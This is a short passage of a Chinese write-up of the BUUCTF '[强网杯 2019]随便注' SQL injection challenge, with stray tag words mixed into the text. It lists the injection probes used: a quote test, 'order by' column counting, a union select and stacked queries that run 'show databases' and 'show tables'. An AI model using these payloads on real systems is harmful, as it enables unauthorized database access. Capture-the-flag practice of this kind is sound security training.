BUUCTF [强网杯 2019]随便注

打开题目看见一个输入框 输入’报错 应该是有sql注入了php 使用 1’ # 正确显示 直接上 order byweb 1' order by 3 # 测试1,2正常,3报错sql 此时天真的我觉得我已经离成功不远了~~shell 启动联合查询svg -1' union select 1,2 # 提交 测试发现堆叠注入可用测试 1';show databases;# 1';show tables
相关文章
相关标签/搜索